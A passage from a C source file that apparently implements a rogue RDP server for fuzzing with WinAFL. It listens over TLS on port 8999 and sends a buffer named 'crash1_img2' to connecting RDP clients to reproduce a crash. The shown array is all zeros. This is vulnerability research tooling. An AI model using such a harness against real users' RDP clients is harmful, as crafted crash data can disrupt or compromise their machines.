		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0
			, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
			, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
			, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
			, 0, 0, 0, 0, 0, 0, 0, 0
			, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
			, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
			,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0,0,0,0,0,0,0,0
		,0,0,0,0,0
	};




	respose_to_rdp_client(crash1_img2, 12288);



	
	// all over
	return 0;
}

DWORD WINAPI accept_handle_connection() {
	ClientSocket = accept(ListenSocket, NULL, NULL);
	if (ClientSocket == INVALID_SOCKET) {
		printf("accept failed with error: %d\n", WSAGetLastError());
		return 1;
	}

	if (start_establish() == -1)
	{
		printf("start establish failed!!!\n");
		return -1;
	}

	if (ssl_established() == -1)
	{
		printf("ssl establish failed!!!\n");;
		return -1;
	}

	recv_loop();
	return 0;
}

int APIENTRY dll_run() {
	/* we have to create a second thread to avoid blocking winAFL in recv */

	ssl_clear();
	if (hr != NULL)
		if (WaitForSingleObject(hr, 0) != WAIT_OBJECT_0)
		{
			TerminateThread(hr, 0);
		}

	accept_handle_connection();

	return 1;
}

int dll_init() {
	static WSADATA wsaData;
	static int iResult;
	static struct addrinfo *result = NULL;
	static struct addrinfo hints;
	static int iSendResult;

	unsigned char server_bind_port[] = "8999";

	SSL_library_init();
	OpenSSL_add_all_algorithms();
	SSL_load_error_strings();
	ctx = SSL_CTX_new(TLSv1_server_method());

	if (SSL_CTX_use_certificate_file(ctx, ".\\ca\\cacert.pem", SSL_FILETYPE_PEM) <= 0)
	{
		ERR_print_errors_fp(stdout);
		ExitProcess(1);
	}
	if (SSL_CTX_use_PrivateKey_file(ctx, ".\\ca\\privkey.pem", SSL_FILETYPE_PEM) <= 0)
	{
		ERR_print_errors_fp(stdout);
		ExitProcess(1);
	}
	if (!SSL_CTX_check_private_key(ctx))
	{
		ERR_print_errors_fp(stdout);
		ExitProcess(1);
	}

	// Initialize Winsock
	iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
	if (iResult != 0) {
		printf("WSAStartup failed with error: %d\n", iResult);
		return 0;
	}

	ZeroMemory(&hints, sizeof(hints));
	hints.ai_family = AF_INET;
	hints.ai_socktype = SOCK_STREAM;
	hints.ai_protocol = IPPROTO_TCP;
	hints.ai_flags = AI_PASSIVE;

	// Resolve the server address and port
	iResult = getaddrinfo(NULL, (PCSTR)server_bind_port, &hints, &result);
	if (iResult != 0) {
		printf("getaddrinfo failed with error: %d\n", iResult);
		WSACleanup();
		return 0;
	}

	// Create a SOCKET for connecting to server
	ListenSocket = socket(result->ai_family, result->ai_socktype, result->ai_protocol);
	if (ListenSocket == INVALID_SOCKET) {
		printf("socket failed with error: %ld\n", WSAGetLastError());
		freeaddrinfo(result);
		WSACleanup();
		return 0;
	}

	// Setup the TCP listening socket
	iResult = bind(ListenSocket, result->ai_addr, (int)result->ai_addrlen);
	if (iResult == SOCKET_ERROR) {
		printf("bind failed with error: %d\n", WSAGetLastError());
		freeaddrinfo(result);
		closesocket(ListenSocket);
		WSACleanup();
		return 0;
	}

	freeaddrinfo(result);

	iResult = listen(ListenSocket, SOMAXCONN);
	if (iResult == SOCKET_ERROR) {
		printf("listen failed with error: %d\n", WSAGetLastError());
		closesocket(ListenSocket);
		WSACleanup();
		ExitProcess(-1);
		return 0;
	}
	printf("init finished\n");
	return 1;
}


int main(int argc, char* argv[]) {
	printf("start\n");
	dll_init();
	dll_run();
	return 0;
}

